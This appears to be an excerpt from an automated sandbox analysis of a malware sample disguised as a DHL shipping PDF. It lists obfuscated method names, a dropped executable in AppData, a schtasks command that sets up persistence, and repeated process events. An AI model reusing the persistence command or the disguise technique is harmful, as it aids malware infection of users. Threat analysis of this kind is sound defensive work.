Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, oub5mXZAxcAJ4e7CmL.cs	High entropy of concatenated method names: 'H3rDfYQhLd', 'do8D2LMxmW', 's9RDL6U2mp', 'JYrDGvrah9', 'qsQDXBuJBZ', 'kG1DNMrNSM', 'raMDtUmJMC', 'ak0DCoLg9e', 'i65DWPxUI8', 'A5EDAk9nst'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, j4dcVGQFuYYN1lp99n.cs	High entropy of concatenated method names: 'aa23rIus4Q', 'jIw3hYfRDC', 'ATl36ASPY5', 'L8e3eGHnQd', 'TwK3xR0aiw', 'MEg31uY9M3', 'ygH3w31TjK', 'Ol83fnd9t0', 'AgN322h0hQ', 'Uk53Jqlnc4'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, ar4R6JmYFKLv5WZ8k1.cs	High entropy of concatenated method names: 'GZ56g371Q', 'Td7ejV2LT', 'lEr1UEF3v', 'MtKwKbW2q', 'Glg2gCPxn', 'HFPJMI1t4', 'dbgLu87YVW0n973wk1', 'fJXjMMS2oae2v8WIjJ', 'TaFbkel1F', 'K5PYqIm0p'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, W4lEIoJhM8fk8vnN1C.cs	High entropy of concatenated method names: 'i8xBxfYWrh', 'GEfBwRWMue', 'g4pduZCd8T', 'PehdX9Q2r7', 'QUCdNhqEnS', 'aHUdIAGO0R', 'NXMdtS0ygG', 'Hv2dCq8mPD', 'ruNdQdC6DE', 'gKbdWVUd8e'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, bq4H3ragxcQa5r2WQr0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rSZUT0bj28', 'TdsUY35vy3', 'F6gUokn5w9', 'PXXUU0vxgM', 'CA1UEVqSVb', 'bIrUjtxXVd', 'vVLUq4BVTH'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, h8GP38zOfSMwxFwida.cs	High entropy of concatenated method names: 'bmYY1ljabV', 'KUEYfJopQ4', 'XNVY2PlMrw', 'S2cYLannxD', 'xX8YG9VtW7', 'SrTYXbfccr', 'TPmYNxaCxJ', 'G9OYqyX235', 'ohcYrlIUkr', 'FAFYhIjaTF'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, eoqqtNpdSyBDwHpxJp.cs	High entropy of concatenated method names: 'GjAYdmnG4L', 'MXiYBUrFKC', 'umCYKUsffC', 'Q9ZY3GCUvp', 'onMYTOL6fA', 'c9CYc1eyvg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, tVxHF7LFhjSrdoutck.cs	High entropy of concatenated method names: 'IXkKH5yBRq', 'D1VK4TOHnA', 'x6fKBaDemW', 'D8FK3IZYZj', 'AdjKcNg9J3', 'ICUBSSNRM3', 'xJ4BlgpeSG', 'jxcBRsS2km', 'BF0By7ocjR', 'xDwB7h2oq8'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, SpU0hSgfHZEdjdtoNO.cs	High entropy of concatenated method names: 's5Ba3EtGHp', 'hjLacxTkv1', 'jOcaneC4WP', 'gsDa8uR4lE', 'TnNas1CoVx', 'eF7a9FhjSr', 'V5AEObZkbwbUKBEYZO', 'hsbDdQppkUPgRcOs3j', 'tKHhKO3fmvsiOIuaro', 'w84aaBr9pT'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, wCcghWl7GAa7Es62jP.cs	High entropy of concatenated method names: 'ui4Mykl93m', 'X5hMpmQvH2', 'gstb58usmS', 'RpgbavPODS', 'hpBMAYVKEx', 'CSjMFU2sol', 'vUdMZHXTIV', 'lOpMi5Zast', 'QW8MkpVFCh', 'S6lM07nyJ5'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, pvTiJU0OEZ0d0H2dOW.cs	High entropy of concatenated method names: 'ToString', 'ENE9APLWUv', 'IKl9GyOncS', 'g8x9uyx8Pb', 'TMw9X8aYFd', 'u3R9NaaGtT', 'XQW9IEsQW4', 'fn49tjRHYD', 'V2k9CLopGR', 'dDP9QOAftk'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, S5QTVe7HZ4oxamuVRL.cs	High entropy of concatenated method names: 'IvITL1nwdU', 'xJFTGaX6mG', 'aWnTueCTWT', 'mqhTXSVUUa', 'RiWTNBuHQr', 'ieiTIrO5lS', 'ebpTtEiry5', 'H6qTC9k24U', 'FWfTQGU0RC', 'w2kTWBfROl'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, Xjno8p4yVG3t2NYqeG.cs	High entropy of concatenated method names: 'Dispose', 'KaYa7GUEEf', 'vjumGKxA06', 'tXMmJQdmvo', 'PVwapYRvyT', 'ko1azZ6X2t', 'ProcessDialogKey', 'oG0m55QTVe', 'eZ4maoxamu', 'lRLmmHoqqt'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, O9dRk1vCUwiGNgpmU6.cs	High entropy of concatenated method names: 'y1yMnHeqCm', 'h4yM80FM1J', 'ToString', 'JXTMPbysLu', 'xnBM4FbsRE', 'dmBMdNKPTN', 'QgNMBdeQMn', 'lmcMKkg7pt', 'Cr4M30hrLu', 'kwCMccDWaG'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, zYXs3Vc364X6vlA5mA.cs	High entropy of concatenated method names: 'vw3OH0Iurc', 'I7KOPY5IRN', 'Yt2O4VYoHF', 'X62OdlXpJa', 'rpSOBkW1TK', 'YLeOKA0cfm', 'rneO3Rcprk', 'QcmOc1QLcn', 'MpoOVkZFbE', 'LGUOncn1oX'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, JNAsw32OceC4WP4sDu.cs	High entropy of concatenated method names: 'xjCdeV5tTa', 'laxd1tqCoo', 'T19dfrPlwQ', 'smPd2JaUki', 'Ta6dsfPGvx', 'SXsd9urI4R', 'DDYdMPV4y2', 'zcfdbgyWd4', 'OOTdTeehAD', 'JmsdYISyHe'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	High entropy of concatenated method names: 'eff4i2VKmW', 'Oav4kinm0h', 'yZ040cVNQ5', 'FmT4vopAps', 'psA4SNBMPR', 'XTd4lGURhs', 'VnS4RQfbkZ', 'F2P4ybC6lr', 'NcN47xxduS', 'Bxs4p0MB28'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, GvF2KIaaAJ3PUFTtlX9.cs	High entropy of concatenated method names: 'HlfYpiprfd', 'nDnYzO7HT7', 'N7xo5lNprx', 'GYJoaBH2ux', 'RT8omlkMtN', 'KlPoOkiWLo', 'FOKog4Duwq', 'xMVoHn0IAn', 'xs6oPdVwjI', 'LxUo4tMSTU'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, mqbZAsRrAIaYGUEEfZ.cs	High entropy of concatenated method names: 'YvdTsjsq3E', 'GlGTMSKhIU', 'prfTTeisgU', 'EpkToIKsrd', 'jk4TEL0jNt', 'x7ATqUex49', 'Dispose', 'AZ0bP7FN8d', 'z76b4YIp1L', 'LDVbdV9n7a'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, oub5mXZAxcAJ4e7CmL.cs	High entropy of concatenated method names: 'H3rDfYQhLd', 'do8D2LMxmW', 's9RDL6U2mp', 'JYrDGvrah9', 'qsQDXBuJBZ', 'kG1DNMrNSM', 'raMDtUmJMC', 'ak0DCoLg9e', 'i65DWPxUI8', 'A5EDAk9nst'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, j4dcVGQFuYYN1lp99n.cs	High entropy of concatenated method names: 'aa23rIus4Q', 'jIw3hYfRDC', 'ATl36ASPY5', 'L8e3eGHnQd', 'TwK3xR0aiw', 'MEg31uY9M3', 'ygH3w31TjK', 'Ol83fnd9t0', 'AgN322h0hQ', 'Uk53Jqlnc4'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, ar4R6JmYFKLv5WZ8k1.cs	High entropy of concatenated method names: 'GZ56g371Q', 'Td7ejV2LT', 'lEr1UEF3v', 'MtKwKbW2q', 'Glg2gCPxn', 'HFPJMI1t4', 'dbgLu87YVW0n973wk1', 'fJXjMMS2oae2v8WIjJ', 'TaFbkel1F', 'K5PYqIm0p'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, W4lEIoJhM8fk8vnN1C.cs	High entropy of concatenated method names: 'i8xBxfYWrh', 'GEfBwRWMue', 'g4pduZCd8T', 'PehdX9Q2r7', 'QUCdNhqEnS', 'aHUdIAGO0R', 'NXMdtS0ygG', 'Hv2dCq8mPD', 'ruNdQdC6DE', 'gKbdWVUd8e'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, bq4H3ragxcQa5r2WQr0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rSZUT0bj28', 'TdsUY35vy3', 'F6gUokn5w9', 'PXXUU0vxgM', 'CA1UEVqSVb', 'bIrUjtxXVd', 'vVLUq4BVTH'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, h8GP38zOfSMwxFwida.cs	High entropy of concatenated method names: 'bmYY1ljabV', 'KUEYfJopQ4', 'XNVY2PlMrw', 'S2cYLannxD', 'xX8YG9VtW7', 'SrTYXbfccr', 'TPmYNxaCxJ', 'G9OYqyX235', 'ohcYrlIUkr', 'FAFYhIjaTF'

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	File created: \dhl shipping details ref id 446331798008765975594-pdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
